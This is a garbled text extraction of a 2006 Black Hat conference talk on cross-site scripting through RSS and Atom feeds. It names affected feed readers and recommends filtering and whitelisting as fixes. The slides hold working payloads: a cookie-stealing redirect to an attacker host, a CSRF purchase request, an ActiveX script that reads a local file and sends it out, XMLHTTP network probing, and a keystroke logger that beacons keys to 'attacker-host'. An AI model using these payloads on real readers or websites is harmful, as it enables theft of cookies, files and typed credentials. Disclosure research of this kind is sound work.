research & development engineer, spi...
TRANSCRIPT
Zero
Da
y S
ub
scri
pti
on
s:
Usin
g R
SS
an
d A
tom
Feed
s A
s
Att
ack D
eli
very
Syste
ms
Bla
ck H
at
US
A 2
00
6
Pre
sen
ted
by B
ob
Au
ger
Researc
h &
De
velo
pm
ent
Eng
ineer,
SP
I D
yn
am
ics
Ta
lk O
ve
rvie
w
•W
hat are
RS
S a
nd A
tom
web feeds?
•A
pplic
ation types u
sin
g them
•W
hat w
as teste
d
•H
ow
to u
tiliz
e a
web feed v
uln
era
bili
ty
•H
ow
each c
lient ty
pe w
as teste
d
•W
hat w
as d
iscovere
d
•V
endor
solu
tions
Wh
at
are
web
fe
ed
s?
•A
way to s
hare
conte
nt
–N
ew
s s
tories
–M
ovie
s a
nd M
P3’s
–B
log e
ntr
ies
•U
se X
ML to s
tore
data
•T
hey d
on’t r
equire the u
ser
to v
isit the s
ite/r
esourc
e in w
hic
h the
conte
nt is
com
ing fro
m
•R
SS
and A
tom
are
the m
ost popula
r w
eb feed form
ats
in u
se
Wh
at
do
th
ey lo
ok lik
e?
•R
SS
Exa
mp
le
<rs
s v
ers
ion
="0
.91
"><
ch
anne
l>
<title
>X
ML
.co
m<
/title
>
<lin
k>
http
://w
ww
.xm
l.co
m/<
/lin
k>
<d
escrip
tio
n>
XM
L.c
om
fe
atu
res a
ric
h m
ix o
f
info
rma
tion
and
se
rvic
es f
or
the
XM
L
co
mm
un
ity.<
/de
scrip
tion
>
<la
ngua
ge
>en
-us<
/la
ngu
age
>
<ite
m>
<title
>N
orm
aliz
ing X
ML
, P
art
2<
/title
>
<lin
k>
htt
p:/
/ww
w.x
ml.co
m/p
ub
/a/2
00
2/1
2/0
4/n
orm
ali
zin
g.h
tml
</lin
k>
<d
escrip
tion
>In
th
is s
eco
nd
an
d f
ina
l lo
ok a
t ap
ply
ing r
ela
tiona
l n
orm
aliz
ation
te
chn
ique
s t
o
W3C
XM
L S
che
ma
da
ta m
ode
ling, W
ill P
rovo
st
dis
cu
sse
s w
hen
no
t to
no
rma
lize
, th
e s
co
pe
of
un
iquene
ss a
nd
the
fou
rth
an
d f
ifth
no
rmal
form
s.
</d
escrip
tion
>
</ite
m>
</c
hann
el>
</r
ss>
•A
tom
Exa
mp
le
<?
xm
l ve
rsio
n=
"1.0
" en
co
din
g=
"utf
-8"?
>
<fe
ed
xm
lns=
"http
://w
ww
.w3
.org
/20
05
/Ato
m">
<title
>E
xa
mp
le F
ee
d<
/title
>
<su
btitle
>In
se
rt w
itty
or
insig
htfu
l re
ma
rk
he
re<
/sub
title
>
<lin
k h
ref=
"htt
p:/
/exa
mp
le.o
rg/"
/>
<u
pda
ted
>20
03
-12
-13T
18
:30
:02
Z<
/upd
ate
d>
<a
uth
or>
<n
am
e>
John
Do
e<
/nam
e>
<e
ma
il>jo
hndoe@
exam
ple
.com
</e
ma
il>
</a
uth
or>
<
id>
urn
:uu
id:6
0a76
c8
0-d
399
-11d9
-b91
C-
00
03939
e0af6
</id
>
<e
ntr
y>
<title
>A
tom
-Po
we
red
Robo
ts R
un
Am
ok<
/title
>
<lin
k h
ref=
"htt
p:/
/exa
mp
le.o
rg/2
003
/12
/13
/ato
m03"/
><
id>
urn
:uu
id:1
225
c69
5-c
fb8
-4ebb
-aaaa
-80
da344
efa
6a
</id
>
<u
pda
ted
>20
03
-12
-13T
18
:30
:02
Z<
/upd
ate
d>
<su
mm
ary
>S
om
e t
ext.
</s
um
ma
ry>
</e
ntr
y>
<
/feed
>
Ab
ou
t R
SS
an
d A
tom
-R
SS
(R
eally
Sim
ple
Synd
ication)
•F
irst
wid
ely
ad
opte
d v
ers
ion w
as 0
.90 c
reate
d b
y N
ets
cap
e in
1999
•R
SS
Vers
ions 0
.90,
0.9
1,
0.9
2,
1.0
, 1.1
, 2.0
.1
-A
tom
•In
July
2003 A
tom
0.2
wa
s c
reate
d o
n a
Wik
i o
wne
d b
y S
am
R
ub
y
•P
roje
ct
moved t
o t
he I
ET
F ‘A
tom
pub w
ork
ing
gro
up' a
nd
cre
ate
d a
form
al A
tom
1.0
sta
ndard
in J
uly
2005
•A
tom
Vers
ions 0
.2,
0.3
, 1.0
Wh
o u
ses t
hem
?
-N
ew
s S
ites
•C
NN
•M
SN
BC
•S
lashd
ot
-W
ebsite o
wn
ers
seekin
g d
yn
am
ic c
onte
nt
-P
rovid
e o
n t
opic
conte
nt
to t
heir u
sers
-P
lace d
yn
am
ic lin
ks o
n t
he
ir s
ites t
o b
oost
traff
ic (
SE
O)
and s
earc
h
engin
e ind
ex-a
bili
ty.
-B
logg
ers
-P
2P
Sites
Ho
w d
o w
eb
feed
s w
ork
?
•P
roducers
–C
reate
the X
ML feed
–S
tore
the feed in a
n X
ML file
, or
cre
ate
it dynam
ically
•C
onsum
ers
–U
se c
onte
nt fr
om
the feed
•N
ew
s S
tories, B
log E
ntr
ies, etc
…
Ho
w d
o w
eb
feed
s w
ork
? (
Co
nti
nu
ed
)
•C
onsum
ers
–M
ultip
le types o
f consum
er
clie
nt ty
pes
•S
tandalo
ne c
lients
–B
row
sers
–R
SS
Reader
and S
harp
Reader
–P
2P
Clie
nts
, and p
odcasting tools
•O
nlin
e R
eaders
such a
s B
loglin
es
•O
ther
Websites
–M
ay d
ispla
y feed c
onte
nt on their w
ebsite
–M
ay r
euse a
feeds c
onte
nt in
its
ow
n feed
Wh
at
clien
t ty
pes w
ere
teste
d?
•Local R
eaders
–B
row
sers
–O
ther
Sta
ndalo
ne r
eaders
•W
eb b
ased r
eaders
•R
isks a
ssocia
ted w
ith feed s
yndic
ation b
y w
eb s
ites
–D
ispla
yin
g the c
onte
nt on a
site
–U
tiliz
ed a
feed to p
opula
te its
ow
n
Ho
w d
oes o
ne u
tilize a
web
feed
vu
lnera
bilit
y?
•V
uln
era
bili
ties in w
eb f
eed c
lients
can b
e u
tiliz
ed if
–T
he feed
ow
ne
r is
malic
ious. T
his
will
not be t
he c
ase in m
ost situations, but
is a
possib
ility
.
–T
he s
ite p
rovid
ing the f
eed w
as h
acked. D
efa
cem
ent a
rchiv
es s
how
thousands o
f sites b
ein
g d
efa
ced d
aily
. A
n a
ttacker
decid
ing to inje
ct
malic
ious p
aylo
ads into
a feed
ra
ther
than d
efa
ce
the s
ite h
as a
gre
ate
r chance o
f evadin
g d
ete
ction fo
r a
longer
period o
f tim
e, and thus to a
ffect
more
machin
es.
–S
om
e W
eb-b
ase
d feeds a
re o
ften
cre
ate
d f
rom
ma
iling lis
ts, bulle
tin b
oard
messages, peer-
to-p
ee
r (P
2P
) w
ebsites, B
it T
orr
en
t sites o
r user
postings
on a
Blo
g. T
his
pro
vid
es a
convenie
nt m
eth
od t
o inje
ct a m
alic
ious p
aylo
ad.
–T
he feed is s
om
ehow
modifie
d d
uring the tra
nsport
phase v
ia P
roxy C
ache p
ois
onin
g.
While
wort
h m
entionin
g, th
e lik
elih
ood o
f th
is is s
lim.
Wh
at
wa
s t
este
d?
•Id
entify
com
monly
used X
ML e
lem
ents
in b
oth
RS
S a
nd A
tom
F
orm
ats
–F
eed T
itle
–F
eed D
escription
–S
tory
Title
–S
tory
Lin
k
–S
tory
Body/D
escription
Ho
w w
ere
th
ey t
este
d?
•P
roduced o
ur
ow
n feeds w
ith m
alic
ious c
onte
nt
–R
SS
–A
tom
•A
ttacked the c
om
mon e
lem
ents
–H
TM
L/S
cript In
jection (
Cro
ss S
ite S
cripting)
•O
bserv
ed d
iffe
rent behavio
rs–
Litera
l H
TM
L/S
cript In
jection
–H
TM
L E
ntities (
< is
the H
TM
L e
ntity
for
< )
–C
om
bin
ation
Exam
ple
Feed
s (
Lit
era
l H
TM
L In
jecti
on
)
•B
oth
feed e
xam
ple
s s
implif
ied
RS
S E
xam
ple
:
<ite
m r
df:
abo
ut=
"http
://h
ost/
abou
t.fo
o">
<title
><
scri
pt>
ale
rt(‘
Ite
m T
itle
')<
/sc
rip
t>
</t
itle
>
<lin
k>
http
://h
ost/
?<
sc
rip
t>a
lert
('It
em
Lin
k')
</s
cri
pt>
</lin
k>
<d
escrip
tio
n>
<s
cri
pt>
ale
rt(‘
Ite
m
Desc
rip
tio
n')
</s
cri
pt>
</d
escrip
tio
n>
<a
uth
or>
<s
cri
pt>
ale
rt(‘
Ite
m A
uth
or'
)</s
cri
pt>
</a
uth
or>
</ite
m>
Ato
m E
xam
ple
<e
ntr
y x
mln
s=
"http
://w
ww
.w3
.org
/20
05
/Ato
m">
<a
uth
or>
<n
am
e>
<sc
rip
t>a
lert
('E
ntr
y A
uth
or
Na
me
')<
/sc
rip
t><
/nam
e>
</a
uth
or>
<p
ub
lished
>2005
-09
-15
T06
:27
:00
-07
:00
</p
ub
lishe
d>
<u
pda
ted
>20
05
-09
-15T
13
:33
:06
</u
pda
ted
>
<lin
k h
ref=
"htt
p:/
/url/?
<sc
rip
t>a
lert
('E
ntr
y
Lin
k')
</s
cri
pt>
" re
l="a
lte
rna
te"
title
="<
sc
rip
t>a
lert
('E
ntr
y L
ink
T
itle
')<
/sc
rip
t>"t
yp
e=
"te
xt/
htm
l"/>
<id
>ta
g:u
rl.c
om
,1999
:blo
g-6
356
614
.po
st-
11
26791
18286
7178
48<
scri
pt>
ale
rt('
En
try
ID')
</s
cri
pt>
</id
>
<title
typ
e=
"htm
l">
<scri
pt>
ale
rt('
En
try
Tit
le')
</s
cri
pt>
</t
itle
>
<co
nte
nt
typ
e=
"xh
tml"
xm
l:b
ase
="h
ttp
://u
rl"x
ml:spa
ce
="p
rese
rve
">
<d
iv x
mln
s=
"http
://w
ww
.w3
.org
/19
99
/xh
tml"
>
<s
cri
pt>
ale
rt('
En
try D
iv X
ML
NS
')<
/sc
rip
t><
/div
><
/co
nte
nt>
<d
raft
xm
lns=
"http
://p
url.o
rg/a
tom
-b
log/n
s#">
fals
e<
/dra
ft>
</e
ntr
y>
Exam
ple
Feed
s (
HT
ML
En
tity
In
jecti
on
)
•X
ML s
pecific
ation r
equires n
on X
ML tags
utiliz
ing the <
tag b
e c
onvert
ed to &
lt; fo
r sto
rage a
nd that it b
e c
onvert
ed b
ack to <
fo
r use
RS
S E
xam
ple
<ite
m r
df:
abo
ut=
"http
://h
ost/
abou
t.fo
o">
<title
> &
lt;s
cri
pt&
gt;
ale
rt(‘
Ite
m T
itle
')&
lt;/
scri
pt&
gt;
</t
itle
>
<lin
k>
http
://h
ost/
?&
lt;s
cri
pt&
gt;
ale
rt(‘
Ite
m
Lin
k')
<
;/s
cri
pt&
gt;
</lin
k>
<d
escrip
tio
n>
<
;sc
rip
t&g
t;a
lert
(‘It
em
D
esc
rip
tio
n')
<
;/sc
rip
t&g
t;<
/de
scrip
tio
n>
<a
uth
or>
<
;sc
rip
t&g
t;a
lert
(‘It
em
A
uth
or'
)<
;/s
cri
pt&
gt;
</a
uth
or>
</ite
m>
Ato
m E
xam
ple
<e
ntr
y x
mln
s=
"http
://w
ww
.w3
.org
/20
05
/Ato
m">
<a
uth
or>
<n
am
e>
<
;scri
pt&
gt;
ale
rt('
En
try A
uth
or
Na
me
')&
lt;/
sc
rip
t&g
t;<
/nam
e>
</a
uth
or>
<p
ub
lished
>2005
-09
-15
T06
:27
:00
-07
:00
</p
ub
lishe
d>
<u
pda
ted
>20
05
-09
-15T
13
:33
:06
</u
pda
ted
>
<lin
k h
ref=
"htt
p:/
/url/?
<
;sc
rip
t&g
t;a
lert
('E
ntr
y
Lin
k')
<
;/s
cri
pt&
gt;
" re
l="a
lte
rna
te"
title
="&
lt;s
cri
pt&
gt;
ale
rt('
En
try L
ink
T
itle
')&
lt;/
scri
pt&
gt;
"typ
e=
"te
xt/
htm
l"/>
<id
>ta
g:u
rl.c
om
,1999
:blo
g-6
356
614
.po
st-
11
26791
18286
7178
48&
lt;s
cri
pt&
gt;
ale
rt('
En
try I
D')
<
;/s
cri
pt&
gt;
</id
>
<title
typ
e=
"htm
l">
<
;sc
rip
t&g
t;a
lert
('E
ntr
y
Tit
le')
<
;/s
cri
pt&
gt;
</t
itle
>
<co
nte
nt
typ
e=
"xh
tml"
xm
l:b
ase
="h
ttp
://u
rl"x
ml:spa
ce
="p
rese
rve
">
<d
iv x
mln
s=
"http
://w
ww
.w3
.org
/19
99
/xh
tml"
>
<
;sc
rip
t&g
t;a
lert
('E
ntr
y D
iv X
ML
NS
')
<
;/sc
rip
t&g
t;<
/div
><
/co
nte
nt>
<d
raft
xm
lns=
"http
://p
url.o
rg/a
tom
-b
log/n
s#">
fals
e<
/dra
ft>
</e
ntr
y>
Ex
am
ple
Fe
ed
s (
Lit
era
l/C
om
bin
ati
on
In
jec
tio
n)
RS
S E
xam
ple
:
<ite
m r
df:
abo
ut=
"http
://h
ost/
abou
t.fo
o">
<title
> &
lt;s
cri
pt>
ale
rt(‘
Ite
m T
itle
')&
lt;/
scri
pt>
</t
itle
>
<lin
k>
http
://h
ost/
?&
lt;s
cri
pt>
ale
rt(‘
Ite
m
Lin
k')
<
;/s
cri
pt>
</lin
k>
<d
escrip
tio
n>
<
;sc
rip
t>a
lert
(‘It
em
D
esc
rip
tio
n')
<
;/sc
rip
t>
</d
escrip
tio
n>
<a
uth
or>
<
;sc
rip
t>a
lert
(‘It
em
Au
tho
r')&
lt;/
sc
rip
t>
</a
uth
or>
</ite
m>
Ato
m E
xam
ple
<e
ntr
y x
mln
s=
"http
://w
ww
.w3
.org
/20
05
/Ato
m">
<a
uth
or>
<n
am
e>
<
;scri
pt>
ale
rt('
En
try A
uth
or
Na
me
')&
lt;/
sc
rip
t><
/na
me
><
/au
tho
r>
<p
ub
lished
>2005
-09
-15
T06
:27
:00
-07
:00
</p
ub
lishe
d>
<u
pda
ted
>20
05
-09
-15T
13
:33
:06
</u
pda
ted
>
<lin
k h
ref=
"htt
p:/
/url/?
<
;sc
rip
t>a
lert
('E
ntr
y
Lin
k')
<
;/s
cri
pt>
" re
l="a
lte
rna
te"
title
="&
lt;s
cri
pt>
ale
rt('
En
try L
ink
T
itle
')&
lt;/
scri
pt>
"typ
e=
"te
xt/
htm
l"/>
<id
>ta
g:u
rl.c
om
,1999
:blo
g-6
356
614
.po
st-
11
26791
18286
7178
48&
lt;s
cri
pt>
ale
rt('
En
try
ID')
<
;/sc
rip
t><
/id
>
<title
typ
e=
"htm
l">
<
;sc
rip
t>a
lert
('E
ntr
y
Tit
le')
<
;/s
cri
pt>
</t
itle
>
<co
nte
nt
typ
e=
"xh
tml"
xm
l:b
ase
="h
ttp
://u
rl"x
ml:spa
ce
="p
rese
rve
">
<d
iv x
mln
s=
"http
://w
ww
.w3
.org
/19
99
/xh
tml"
>&
lt;s
cri
pt>
ale
rt('
En
try D
iv
XM
LN
S')
<
;/sc
rip
t><
/div
><
/co
nte
nt>
<d
raft
xm
lns=
"http
://p
url.o
rg/a
tom
-b
log/n
s#">
fals
e<
/dra
ft>
</e
ntr
y>
Co
nsu
mer
Testi
ng
(W
eb
Based
)
•U
tiliz
ed
th
e e
xa
mp
le feed
s
•S
ub
scrib
ed
to
them
with
an
on
line
rea
de
r
–T
rad
itio
na
lly lite
ral ta
g in
jectio
n y
ield
ed
be
tte
r re
su
lts
–H
TM
L E
ntitie
s/C
om
bin
atio
n w
ere
no
t co
nve
rted
•M
ana
ge
d to
in
ject
and
exe
cu
te J
ava
Scrip
t–
Ste
al C
oo
kie
s f
rom
the o
nlin
e w
eb
reade
r site
<item
rd
f:abou
t="h
ttp:/
/host/
about.
foo">
<title>
My S
tory
Title
</title
>
<lin
k>
http:/
/host/
sto
ry.p
hp<
/lin
k>
<description>
<scri
pt>
do
cu
men
t.lo
ca
tio
n=
'htt
p:/
/att
ack
-ho
st/
cg
i-b
in/c
oo
kie
.cg
i?
'%20+
do
cu
me
nt.
co
okie
</s
cri
pt>
</d
escription>
</ite
m>
Co
nsu
mer
Testi
ng
(W
eb
Based
) (C
on
tin
ued
)
•P
erf
orm
Cro
ss S
ite R
equest F
org
ery
(C
SR
F)
Attacks
–T
rick the b
row
ser
into
sendin
g a
request to
a s
ite they m
ay b
e c
urr
ent lo
gged into
, and
perf
orm
a w
ebsite function
–T
hey e
xplo
it the tru
st th
e w
ebsite h
as for
the c
lient m
akin
g the
requests
<item
rd
f:abou
t="h
ttp:/
/host/
about.
foo">
<title>
My S
tory
Title
</title
>
<lin
k>
http:/
/host/
sto
ry.p
hp<
/lin
k>
<description>
<
img s
rc=
"https://s
tore
.exam
ple
.com
/buy?item
=sta
mps&
quantity
=100">
</d
escription>
</ite
m>
•C
onte
xt
of th
e v
uln
era
bili
ty w
as w
ithin
the s
ites r
em
ote
zone
•H
ad a
ccess to functionalit
y e
xposed w
ith C
ross S
ite S
cripting A
ttacks
•A
bili
ty t
o log k
eystr
okes
•H
ow
pra
ctical is
this
vuln
era
bili
ty?
Majo
r w
eb
based
read
ers
aff
ecte
d
(Blo
glin
es)
•B
loglin
es
–P
oor
input filtering
•O
nm
ouseover
vs o
nm
ouseover
Oth
er
Majo
r sit
es a
ffecte
d
•10/1
8/2
005 a
n issue is d
iscovere
d in Y
ahoo
•http://w
ww
.allj
er.
com
/yahoors
sxss.h
tm
•7/2
006 a
n issue is d
iscovere
d in G
oogle
’s R
SS
reader
•http://h
a.c
kers
.org
/blo
g/2
0060704/c
ross-s
ite-s
cripting-
vuln
era
bili
ty-in-g
oogle
/
Co
nsu
mer
Testi
ng
Exam
ple
(L
ocal
Read
er)
•U
tiliz
ed the e
xam
ple
feeds
•S
ubscribed to them
with a
local re
ader
–T
este
d b
row
sers
–T
este
d s
tand a
lone c
lients
–H
TM
L E
ntity
inje
ction y
ield
ed b
etter
results
•D
iscovere
d d
iffe
rent re
aders
used d
iffe
rent conte
xts
–Local Z
one
–R
em
ote
Zone/S
am
e S
ite
Co
nsu
mer
Testi
ng
Exam
ple
(L
ocal
Read
er)
(C
on
tin
ued
)
•R
em
ote
Co
nte
xt
–R
em
ote
zon
e is w
ith
in t
he s
am
e s
ite c
onte
xt,
or
the s
ite b
ein
g
'vie
we
d‘
•A
ccess t
o c
ookie
s o
n t
hat
sam
e s
ite
–D
oes n
ot
have a
ccess t
o t
he f
ile s
yste
m inte
ntionally
–S
endin
g o
ther
typ
es o
f re
quests
•W
eb b
ased A
ttacks
–S
QL I
nje
ction,
Com
man
d E
xe
cution,
Den
ial of
Serv
ice,
Cro
ss S
ite R
eq
uest
Forg
ery
(C
SR
F)
<im
g s
rc=
"htt
ps:/
/site/b
uy?ite
m=
sta
mps&
quantity
=10
0">
•P
ote
ntial fo
r W
eb F
orm
Spam
–M
an
y t
echno
logie
s/lib
rari
es a
llow
convers
ion
of
PO
ST
to
GE
T s
uch a
s P
erls C
GI.
pm
Module
Co
nsu
mer
Testi
ng
Exam
ple
(L
ocal
Read
er)
(C
on
tin
ued
)
•Local Z
one C
onte
xt
–Y
ou'll
typic
ally
be in the local zone w
hen r
eadin
g a
file
directly fro
m the file
syste
m
–A
bili
ty to d
o m
ost of w
hat is
possib
le in the r
em
ote
zone
–A
ccess to inte
resting A
ctiveX
Com
ponents
•A
ccess to the F
ile s
yste
m
•U
nre
str
icte
d a
ccess to the X
MLH
TT
P o
bje
ct (A
jax)
Lo
cal R
ead
er
Testi
ng
Exam
ple
(L
ocal Z
on
e)
•A
ctive
X c
om
ponen
ts m
ay a
llow
Lo
ca
l A
cce
ss to
the
file
syste
m
•L
ive
De
mo
<ite
m r
df:
abo
ut=
"http
://s
ite
/abou
t.fo
o">
<title
>M
y w
itty
title
</t
itle
>
<lin
k>
http
://s
ite
/url<
/lin
k>
<d
escrip
tio
n>
<scrip
t>
txtF
ile=
"";t
heF
ile=
"C:\
\test.
txt"
;va
r th
isF
ile =
new
Acti
veX
Ob
ject(
"Scri
pti
ng
.Fil
eS
yste
mO
bje
ct"
);va
r R
ead
Th
isF
ile =
th
isF
ile.O
pen
TextF
ile(t
heF
ile,1
,tru
e);
txtF
ile+
= R
ead
Th
isF
ile.R
ead
All
();
hea
vyIm
ag
e =
new
Im
ag
e()
;h
ea
vyIm
ag
e.s
rc =
"h
ttp
://h
ost/
?fi
le=
" +
txtF
ile;
Read
Th
isF
ile.C
lose()
;<
/scrip
t>
</d
escrip
tio
n>
<
/ite
m>
Lo
ca
l R
ea
de
r T
es
tin
g E
xa
mp
le (
Lo
ca
l Z
on
e)
(Co
nti
nu
ed
)
•64.x
.x.x
--
[24/J
ul/200
6:1
1:4
2:2
8 -
0400]
"GE
T
/?file
=T
his
%20is
%20te
xt%
20fr
om
%20
within
%20c:\
\test.
txt H
TT
P/1
.1"
200 3
1973 "
-" "
Mozill
a/4
.0 (
co
mpatible
; M
SIE
6.0
; W
indo
ws N
T 5
.1;
SV
1;
.NE
T C
LR
1.1
.4322;
Info
Path
.1;
.NE
T C
LR
2.0
.50
727
)“
•Y
es t
he u
ser
is p
resente
d w
ith
a p
opup in t
his
exam
ple
. S
ince w
hen
has t
his
sto
ppe
d a
n a
ttacker?
Lo
ca
l R
ea
de
r T
es
tin
g E
xa
mp
le (
Lo
ca
l Z
on
e)
(Co
nti
nu
ed
)
•Local pro
vid
es u
nre
str
icte
d a
ccess to t
he X
MLH
TT
P/X
MLH
ttpR
equestA
JA
X
obje
ct
–P
ort
scannin
g o
f backend n
etw
ork
s
–A
ttackin
g d
iscovere
d h
osts
<item
rd
f:abou
t="h
ttp:/
/site/a
bou
t.fo
o">
<title>
My w
itty
title
</title
>
<lin
k>
http:/
/site/u
rl<
/lin
k>
<description>
<script>
var
po
st_
da
ta =
'n
am
e=
va
lue';
var
xm
lhtt
p=
new
A
cti
veX
Ob
jec
t("M
icro
so
ft.X
ML
HT
TP
") x
mlh
ttp
.op
en
("P
OS
T",
'h
ttp
://u
rl/p
ath
/fil
e.e
xt'
, tr
ue
); x
mlh
ttp
.on
read
ys
tate
ch
an
ge
= f
un
cti
on
()
{ if
(x
mlh
ttp
.read
yS
tate
==
4)
{ ale
rt(x
mlh
ttp
.resp
on
seT
ext)
; }
};
xm
lhtt
p.s
en
d(p
ost_
da
ta);
</s
cript>
</d
escription>
</ite
m>
Lo
ca
l R
ea
de
r T
es
tin
g E
xa
mp
le (
Lo
ca
l Z
on
e)
(Co
nti
nu
ed
)
Co
nsu
mer
Testi
ng
Exam
ple
(W
eb
sit
e)
•W
ebsite feed u
sage
–C
onte
xt
dis
pla
yed o
n the s
ite
•A
n a
ttacker
can o
bta
in ‘site c
onte
xt’
(or
rem
ote
zone)
access if
HT
ML tag inje
ction
is a
llow
ed
–C
ookie
Theft, C
SR
F, keystr
oke loggin
g
–C
om
mon r
isks a
ssocia
ted w
ith C
ross S
ite S
cripting
•W
hat if the a
ttacker
managed to g
et th
eir s
cript execute
d o
n a
website d
ispla
yin
g
their feed?
Co
nsu
mer
Te
sti
ng
Ex
am
ple
(W
eb
sit
e f
ee
d)
(Co
nti
nu
ed
)
•C
onte
nt
recycle
d into
a n
ew
feed
–S
ites filt
ering m
alic
ious tags s
uch a
s <
and >
ma
y s
till
allo
w a
ttack
pro
pagation
•E
xam
ple
allo
win
g &
lt; and &
gt;
–T
heir feed m
ay b
e r
ecycle
d o
n a
noth
er
website
–A
llow
s a
n a
ttacker
to o
bta
in m
ultip
le s
ite c
onte
xts
–If t
he 2
nd
feed
is inclu
ded in a
3rd
feed
<item
>
<title>
Bugtr
aq:
OpenP
KG
-SA
-200
6.0
13 O
penP
KG
Security
Advis
ory
(m
utt
) (S
ecurity
Focus V
uln
era
bili
ties)<
/title
>
<lin
k>
http:/
/ww
w.s
ecurity
focus.c
om
/arc
hiv
e/1
/440148<
/lin
k>
<guid
>http:/
/ww
w.s
ecurity
focus.c
om
/arc
hiv
e/1
/440148<
/guid
>
</ite
m>
–Is
sues a
ssocia
ted w
ith L
ocal R
eaders
are
wid
e o
pen to t
he w
ebsite
imple
menting the feeds u
sers
Overa
ll t
esti
ng
resu
lts
•T
he m
ajo
rity
of
applic
ations teste
d w
he
re a
ffecte
d
–M
an
y s
trip
ped o
ut lit
era
l ta
g inje
ction
•<
script>
Foo<
/scri
pt>
•W
eb b
ased r
ead
ers
were
typic
ally
affecte
d
–T
he m
ajo
rity
convert
ed t
he H
TM
L e
ntities to <
and
> b
efo
re d
ispla
yin
g it
•&
lt;s
cript&
gt;F
oo&
lt;/script&
gt;
•Local re
aders
typ
ically
affecte
d
–S
om
e o
f th
em
str
ipped the <
bra
cket and w
he
re a
ffecte
d b
y H
TM
L e
ntities
•&
lt;s
cript>
Foo&
lt;/script>
•Local re
aders
•Lack o
f V
alid
ation d
uring the
pre
senta
tion p
hase
Pro
du
cts
aff
ecte
d
•M
ost applic
ations teste
d a
ffecte
d to s
om
e p
oin
t
•W
eb B
ased R
eaders
–B
loglin
es
•Local R
eaders
–R
SS
Reader
(#1 o
n G
oogle
)
–R
SS
Ow
l
–F
eed D
em
on
–S
harp
Reader
Pra
cti
cal U
se C
ase #
1
Pra
cti
cal U
se C
ase #
2 (
Web
sit
e)
•A
n a
ttacker
may in
ject
ke
ystr
oke logg
ing J
avaS
cript
on w
eb
site
dis
pla
yin
g t
he f
eed
<script
LA
NG
UA
GE
="J
avaS
cript"
>
docum
ent.
captu
reE
vents
(Eve
nt.
KE
YP
RE
SS
);
docum
ent.
onke
ypre
ss =
captu
reK
eyS
trokes;
function c
aptu
reK
eyS
trokes(e
) {
var
ke
y =
Str
ing.f
rom
CharC
ode(e
.wh
ich);
var
img =
ne
w I
mage()
;
var
src
= "
htt
p:/
/att
acker-
host/
?"
+ "
keystr
oke=
" +
escape(k
ey);
img.s
rc =
src
;
retu
rn t
rue;
} </s
cript>
Pra
cti
cal U
se C
ase #
2 (
Web
sit
e)
(Co
nti
nu
ed
)
•S
om
e s
ites d
ispla
y the feed o
n e
very
page. T
his
makes
keystr
oke loggin
g v
ery
convenie
nt
–A
llow
s a
n a
ttacker
to r
ecord
every
thin
g t
he u
ser
is t
ypin
g,
on e
very
page.
This
could
inclu
de s
ensitiv
e info
rmatio
n s
uch a
s c
rede
ntials
or
oth
er
pers
on
al data
–D
em
o K
ey s
tro
ke logg
ing
Pra
cti
cal U
se C
ase #
3 (
Web
Sit
e)
Wh
at’
s t
he s
olu
tio
n?
Security
or
usabili
ty?
Secu
rity
•S
trip
pin
g m
alic
ious tags s
uch a
s <
>()
”
–M
ay r
em
ove f
unctionalit
y a
nd the a
bili
ty f
or
HT
ML f
orm
attin
g
–W
ill p
revent th
e issues d
iscovere
d
–R
em
oves H
TM
L f
orm
attin
g
•C
onvert
ing tags to their H
TM
L e
ntities f
or
the p
resenta
tion p
hase
Usab
ilit
y
•D
isablin
g S
cript, A
pp
let, a
nd P
lug-in E
xecution
–A
llow
HT
ML
–S
till
allo
ws C
SR
F a
ttacks
–P
rovid
es m
ore
functionalit
y
Mid
dle
gro
un
d
•W
hite lis
ting c
ert
ain
HT
ML T
ags
–<
b>
–<
br>
–<
font>
–R
estr
ict H
TM
L a
ttribute
s
•D
isable
script/plu
g-i
n e
xecution
Ad
dit
ion
al are
a’s
of
researc
h
•P
2P
applic
atio
ns
•P
odcastin
g C
lients
–A
uto
matically
do
wnlo
ad f
iles
•D
VR
’s s
uch a
s T
ivo a
nd e
mb
edde
d s
yste
ms
•A
d s
pam
min
g into
exis
ting f
ee
ds
•S
EO
(S
earc
h E
ngin
e O
ptim
ization)
spam
min
g
•E
xte
nsiv
e r
evie
w o
f each e
lem
ent
in t
he R
SS
and A
tom
Sta
ndard
s
Refe
ren
ces a
nd
Ad
dit
ion
al R
ead
ing
•H
ackin
g W
eb 2
.0: R
SS
and A
tom
Feed I
mple
menta
tion V
uln
era
bili
ties
–http:/
/ww
w.s
pid
ynam
ics.c
om
/spila
bs/e
ducation/w
hitepapers
.htm
l
•C
ross-S
ite R
equest F
org
ery
–http:/
/en
.wik
ipedia
.org
/wik
i/C
ross-s
ite_re
quest_
forg
ery
•W
ikip
edia
RS
S P
age
–http:/
/en
.wik
ipedia
.org
/wik
i/R
SS
_(f
ile_fo
rmat)
•R
SS
Specific
ation
–http:/
/ww
w.r
ss-s
pecific
ations.c
om
/rss-s
pecific
ations.h
tm
•P
his
hin
g w
ith S
uperb
ait
–http:/
/ww
w.w
hite
hats
ec.c
om
/pre
senta
tions/p
his
hin
g_superb
ait.p
df
•A
tom
Specific
ation
–http:/
/ww
w.a
tom
enable
d.o
rg/
•R
SS
Security
Re
sourc
e A
rchiv
e (
Big
pim
pin
)
–http:/
/ww
w.c
gis
ecurity
.com
/rss/
Co
nclu
sio
ns
•R
egard
less w
here
the d
ata
is c
om
ing fro
m y
ou n
eed to a
ssum
e
it’s
malic
ious
–W
hat conte
xt is
this
data
goin
g to b
e u
sed in?
•Id
entify
pote
ntial risks
–W
hat ty
pe o
f data
is w
ort
h s
toring?
•W
hite lis
t accepta
ble
data
types
•C
ross S
ite S
cripting is s
tart
ing to b
ecom
e m
ore
usefu
l
•T
hese s
lides c
an b
e found o
n h
ttp://w
ww
.spid
ynam
ics.c
om
/